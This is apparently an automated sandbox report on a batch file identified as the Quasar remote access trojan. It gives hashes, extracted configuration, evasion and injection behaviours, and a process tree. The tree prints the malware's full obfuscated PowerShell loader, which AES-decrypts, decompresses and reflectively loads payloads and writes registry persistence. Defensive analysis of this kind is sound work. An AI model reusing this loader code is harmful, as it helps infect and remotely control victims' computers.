quasar | f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f

Resubmissions

17/01/2025, 19:07

250117-xsph9a1jek 10

17/01/2025, 19:00

250117-xn3kbazqhk 10

Analysis

max time kernel
91s
max time network
91s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
17/01/2025, 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

filetest.bat
Size

7.9MB
MD5

f88d18fc65296a1ed460e40a352e3045
SHA1

f6d9d94da2f11d0485ca057a057a06ac492bde8c
SHA256

f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f
SHA512

f193edd5c475040928e188b756d27ecb2f61ef6a1d7392bdb62e6d5bcdd5c37272849a298e9cc6265b5f67890881971ecf28f93e98edd90f6f536190999ed367
SSDEEP

49152:h4ANZ4/rNl/dichvhGpPK7kMes5mmCq/BWZHtPrBe7XTADqoh6EKQJS2H/WkTb/2:6

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

encryption_key
B98A458BCEB5C110558E7281A7F389412ABA4472
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/1532-1386-0x0000025C80C30000-0x0000025C8139A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2572 created 624	2572	powershell.exe	5
PID 1532 created 624	1532	powershell.exe	5

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	1532	powershell.exe
10	1532	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2572	powershell.exe
1532	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Deletes itself 1 IoCs

pid	Process
2572	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\$nya-vZbimLFn	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2572 set thread context of 4688	2572	powershell.exe	87
PID 1532 set thread context of 2804	1532	powershell.exe	96

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$rbx-onimai2	powershell.exe
File created	C:\Windows\$rbx-onimai2\$rbx-CO2.bat	cmd.exe
File created	C:\Windows\$nya-onimai2\uninstalling	powershell.exe
File opened for modification	C:\Windows\$nya-onimai2	powershell.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4772	powershell.exe
4772	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
1312	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
1312	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
1312	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
1532	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
1532	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	4688	dllhost.exe
Token: SeShutdownPrivilege	3636	Explorer.EXE
Token: SeCreatePagefilePrivilege	3636	Explorer.EXE
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe
Token: SeIncreaseQuotaPrivilege	2340	svchost.exe
Token: SeSecurityPrivilege	2340	svchost.exe
Token: SeTakeOwnershipPrivilege	2340	svchost.exe
Token: SeLoadDriverPrivilege	2340	svchost.exe
Token: SeSystemtimePrivilege	2340	svchost.exe
Token: SeBackupPrivilege	2340	svchost.exe
Token: SeRestorePrivilege	2340	svchost.exe
Token: SeShutdownPrivilege	2340	svchost.exe
Token: SeSystemEnvironmentPrivilege	2340	svchost.exe
Token: SeUndockPrivilege	2340	svchost.exe
Token: SeManageVolumePrivilege	2340	svchost.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeShutdownPrivilege	3636	Explorer.EXE
Token: SeCreatePagefilePrivilege	3636	Explorer.EXE
Token: SeShutdownPrivilege	3636	Explorer.EXE
Token: SeCreatePagefilePrivilege	3636	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe
Token: SeIncreaseQuotaPrivilege	2340	svchost.exe
Token: SeSecurityPrivilege	2340	svchost.exe
Token: SeTakeOwnershipPrivilege	2340	svchost.exe
Token: SeLoadDriverPrivilege	2340	svchost.exe
Token: SeSystemtimePrivilege	2340	svchost.exe
Token: SeBackupPrivilege	2340	svchost.exe
Token: SeRestorePrivilege	2340	svchost.exe
Token: SeShutdownPrivilege	2340	svchost.exe
Token: SeSystemEnvironmentPrivilege	2340	svchost.exe
Token: SeUndockPrivilege	2340	svchost.exe
Token: SeManageVolumePrivilege	2340	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe
Token: SeIncreaseQuotaPrivilege	2340	svchost.exe
Token: SeSecurityPrivilege	2340	svchost.exe
Token: SeTakeOwnershipPrivilege	2340	svchost.exe
Token: SeLoadDriverPrivilege	2340	svchost.exe
Token: SeSystemtimePrivilege	2340	svchost.exe
Token: SeBackupPrivilege	2340	svchost.exe
Token: SeRestorePrivilege	2340	svchost.exe
Token: SeShutdownPrivilege	2340	svchost.exe
Token: SeSystemEnvironmentPrivilege	2340	svchost.exe
Token: SeUndockPrivilege	2340	svchost.exe
Token: SeManageVolumePrivilege	2340	svchost.exe
Token: SeDebugPrivilege	1968	wmiprvse.exe
Token: SeAuditPrivilege	2240	svchost.exe
Token: SeAuditPrivilege	2808	svchost.exe
Token: SeAuditPrivilege	2808	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe
Token: SeIncreaseQuotaPrivilege	2340	svchost.exe
Token: SeSecurityPrivilege	2340	svchost.exe
Token: SeTakeOwnershipPrivilege	2340	svchost.exe
Token: SeLoadDriverPrivilege	2340	svchost.exe
Token: SeSystemtimePrivilege	2340	svchost.exe
Token: SeBackupPrivilege	2340	svchost.exe
Token: SeRestorePrivilege	2340	svchost.exe
Token: SeShutdownPrivilege	2340	svchost.exe
Token: SeSystemEnvironmentPrivilege	2340	svchost.exe
Token: SeUndockPrivilege	2340	svchost.exe
Token: SeManageVolumePrivilege	2340	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE
3636	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1532	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2052 wrote to memory of 4772	2052	cmd.exe	82
PID 2052 wrote to memory of 4772	2052	cmd.exe	82
PID 4772 wrote to memory of 4348	4772	powershell.exe	84
PID 4772 wrote to memory of 4348	4772	powershell.exe	84
PID 2052 wrote to memory of 3212	2052	cmd.exe	85
PID 2052 wrote to memory of 3212	2052	cmd.exe	85
PID 2052 wrote to memory of 2572	2052	cmd.exe	86
PID 2052 wrote to memory of 2572	2052	cmd.exe	86
PID 2572 wrote to memory of 4688	2572	powershell.exe	87
PID 2572 wrote to memory of 4688	2572	powershell.exe	87
PID 2572 wrote to memory of 4688	2572	powershell.exe	87
PID 2572 wrote to memory of 4688	2572	powershell.exe	87
PID 2572 wrote to memory of 4688	2572	powershell.exe	87
PID 2572 wrote to memory of 4688	2572	powershell.exe	87
PID 2572 wrote to memory of 4688	2572	powershell.exe	87
PID 2572 wrote to memory of 4688	2572	powershell.exe	87
PID 4688 wrote to memory of 624	4688	dllhost.exe	5
PID 4688 wrote to memory of 684	4688	dllhost.exe	7
PID 4688 wrote to memory of 964	4688	dllhost.exe	12
PID 4688 wrote to memory of 404	4688	dllhost.exe	13
PID 4688 wrote to memory of 416	4688	dllhost.exe	14
PID 4688 wrote to memory of 700	4688	dllhost.exe	15
PID 4688 wrote to memory of 1036	4688	dllhost.exe	16
PID 4688 wrote to memory of 1064	4688	dllhost.exe	17
PID 4688 wrote to memory of 1144	4688	dllhost.exe	18
PID 4688 wrote to memory of 1256	4688	dllhost.exe	20
PID 4688 wrote to memory of 1264	4688	dllhost.exe	21
PID 4688 wrote to memory of 1316	4688	dllhost.exe	22
PID 4688 wrote to memory of 1340	4688	dllhost.exe	23
PID 4688 wrote to memory of 1360	4688	dllhost.exe	24
PID 4688 wrote to memory of 1496	4688	dllhost.exe	25
PID 4688 wrote to memory of 1552	4688	dllhost.exe	26
PID 4688 wrote to memory of 1564	4688	dllhost.exe	27
PID 4688 wrote to memory of 1580	4688	dllhost.exe	28
PID 4688 wrote to memory of 1700	4688	dllhost.exe	29
PID 4688 wrote to memory of 1716	4688	dllhost.exe	30
PID 4688 wrote to memory of 1824	4688	dllhost.exe	31
PID 4688 wrote to memory of 1844	4688	dllhost.exe	32
PID 684 wrote to memory of 1968	684	lsass.exe	83
PID 4688 wrote to memory of 1944	4688	dllhost.exe	33
PID 4688 wrote to memory of 1972	4688	dllhost.exe	34
PID 4688 wrote to memory of 1980	4688	dllhost.exe	35
PID 684 wrote to memory of 2240	684	lsass.exe	40
PID 684 wrote to memory of 1968	684	lsass.exe	83
PID 4688 wrote to memory of 2032	4688	dllhost.exe	36
PID 684 wrote to memory of 2240	684	lsass.exe	40
PID 4688 wrote to memory of 2040	4688	dllhost.exe	37
PID 4688 wrote to memory of 2152	4688	dllhost.exe	38
PID 4688 wrote to memory of 2240	4688	dllhost.exe	40
PID 4688 wrote to memory of 2340	4688	dllhost.exe	41
PID 4688 wrote to memory of 2360	4688	dllhost.exe	42
PID 4688 wrote to memory of 2544	4688	dllhost.exe	43
PID 2572 wrote to memory of 2432	2572	powershell.exe	88
PID 2572 wrote to memory of 2432	2572	powershell.exe	88
PID 684 wrote to memory of 2828	684	lsass.exe	47
PID 684 wrote to memory of 2828	684	lsass.exe	47
PID 4688 wrote to memory of 2552	4688	dllhost.exe	44
PID 4688 wrote to memory of 2752	4688	dllhost.exe	45
PID 4688 wrote to memory of 2808	4688	dllhost.exe	46
PID 4688 wrote to memory of 2828	4688	dllhost.exe	47
PID 4688 wrote to memory of 2848	4688	dllhost.exe	48
PID 4688 wrote to memory of 2856	4688	dllhost.exe	49
PID 4688 wrote to memory of 2904	4688	dllhost.exe	50
PID 4688 wrote to memory of 2980	4688	dllhost.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1036
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{48ce549d-5a00-4fa5-af8e-232dc9c11555}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4688
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c2de0613-10de-4524-a99c-d55155423ecf}
  2⤵
  PID:2804

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1256
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1340

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1552
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1824

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2040

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2808

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2980

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3548

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\filetest.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4772
  - - C:\Windows\system32\findstr.exe
      "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
      4⤵
      PID:4348
- - C:\Windows\system32\cmd.exe
    cmd.exe /c echo function qmFV($REHT){ Invoke-Expression -InformationAction Ignore '$TTZK=vB[vBSvByvBstvBevBmvB.vBSvBevBcvBurvBivBtvBy.vBCvBrvBypvBtvBovBgrvBapvBhvBy.vBAevBsvB]:vB:vBCvBrvBeavBtvBevB()vB;'.Replace('vB', ''); Invoke-Expression -Debug '$TTZK.PkMPkoPkdPke=Pk[PkSPkyPksPktPkePkm.PkSPkePkcuPkrPkiPktyPk.PkCPkryPkptPkoPkgrPkapPkhPky.PkCPkiPkpPkhePkrPkMPkodPkePk]:Pk:PkCPkBCPk;'.Replace('Pk', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose '$TTZK.vsPvsavsdvsdivsnvsgvs=vs[vsSvsyvsstvsevsmvs.Svsevscvsurvsivstvsy.vsCrvsyvsptvsogvsrvsapvshvsyvs.vsPavsdvsdvsinvsgvsMovsdvsevs]:vs:vsPvsKvsCvsSvs7vs;'.Replace('vs', ''); Invoke-Expression -Debug '$TTZK.xPKxPexPyxP=[xPSxPyxPsxPtxPexPmxP.CxPoxPnxPvexPrxPtxP]:xP:xPFxProxPmBxPaxPsexP64xPSxPtrxPixPnxPg("xPhxPOxPixPbxxP/xPTxPsxPDxPUxPfxPQDxPvxPLxP4VxPDxPHxP90xPGxPfxP9kxPJCxPixPJFxPcuxPDxP8yxPAxPbxPMxPeCxP4xPWxPc=xP");'.Replace('xP', ''); Invoke-Expression -Debug '$TTZK.dkIdkVdk=dk[Sdkydksdktdkedkmdk.dkCodkndkvdkerdktdk]dk::dkFdkrdkomdkBadksdke6dk4Sdktdkridkndkg("dkBdkvdkidkt0dkjdkfdkAdkudkJdk4dk7Jdk1dkLdk6bdkOdkGdk79dkQdk=dk=");'.Replace('dk', ''); $pOIf=$TTZK.CreateDecryptor(); $TvBT=$pOIf.TransformFinalBlock($REHT, 0, $REHT.Length); $pOIf.Dispose(); $TTZK.Dispose(); $TvBT;}function MetK($REHT){ Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$RRoW=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA(,$REHT);'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$HnaT=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA;'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$OYGv=KVNKVeKVwKV-OKVbKVjKVeKVcKVtKV KVSyKVsKVtKVemKV.KVIKVO.KVCKVoKVmpKVreKVsKVsiKVonKV.KVGZKViKVpKVSKVtrKVeKVaKVm($RRoW, KV[KVIKVOKV.CKVoKVmKVpKVrKVeKVsKVsiKVoKVnKV.CKVoKVmKVprKVeKVsKVsiKVonKVMKVodKVe]KV:KV:DKVeKVcKVoKVmpKVrKVeKVssKV);'.Replace('KV', ''); $OYGv.CopyTo($HnaT); $OYGv.Dispose(); $RRoW.Dispose(); $HnaT.Dispose(); $HnaT.ToArray();}function EXHV($REHT,$EVat){ Invoke-Expression -Verbose '$gHke=DN[DNSDNyDNstDNeDNmDN.DNRDNeDNfDNleDNcDNtDNioDNnDN.DNAsDNsDNeDNmbDNlyDN]DN::DNLoDNaDNd([byte[]]$REHT);'.Replace('DN', ''); Invoke-Expression -InformationAction Ignore '$vNwL=$gHke.CAECAnCAtCAryCAPCAoCAiCAnCAtCA;'.Replace('CA', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$vNwLio.ioIioniovoiokioeio(io$ioniouiollio, $EVat);'.Replace('io', '');}function JYY($vrvS){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'MhRVQwCgfyDG;ODJpvpxTYFqN;dlOMrqSijFnyTh'; Set-ItemProperty -Path $registryPath -Name 'MhRVQwCgfyDG' -Value $vrvS; Set-ItemProperty -Path $registryPath -Name 'ODJpvpxTYFqN' -Value 'hOibx/TsDUfQDvL4VDH90Gf9kJCiJFcuD8yAbMeC4Wc='; Set-ItemProperty -Path $registryPath -Name 'dlOMrqSijFnyTh' -Value 'Bvit0jfAuJ47J1L6bOG79Q==';}$lVPp = 'C:\Users\Admin\AppData\Local\Temp\filetest.bat';$host.UI.RawUI.WindowTitle = $lVPp;$Enkb=[System.IO.File]::ReadAllText($lVPp).Split([Environment]::NewLine);foreach ($bUJs in $Enkb) { if ($bUJs.StartsWith('WWiTL')) { $DBhl=$bUJs.Substring(5); break; }}JYY $DBhl;$vrvS=[string[]]$DBhl.Split('\');Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$opM = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Debug '$tHS = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Verbose -Debug '$Hrm = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');EXHV $opM $null;EXHV $tHS $null;EXHV $Hrm (,[string[]] (''));
    3⤵
    PID:3212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Deletes itself
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\filetest.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
      4⤵
      Drops file in Windows directory
      PID:2432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
      4⤵
      PID:2740
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1312
      - C:\Windows\system32\findstr.exe
        
        "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
        6⤵
        
        PID:408
    - - C:\Windows\system32\cmd.exe
        
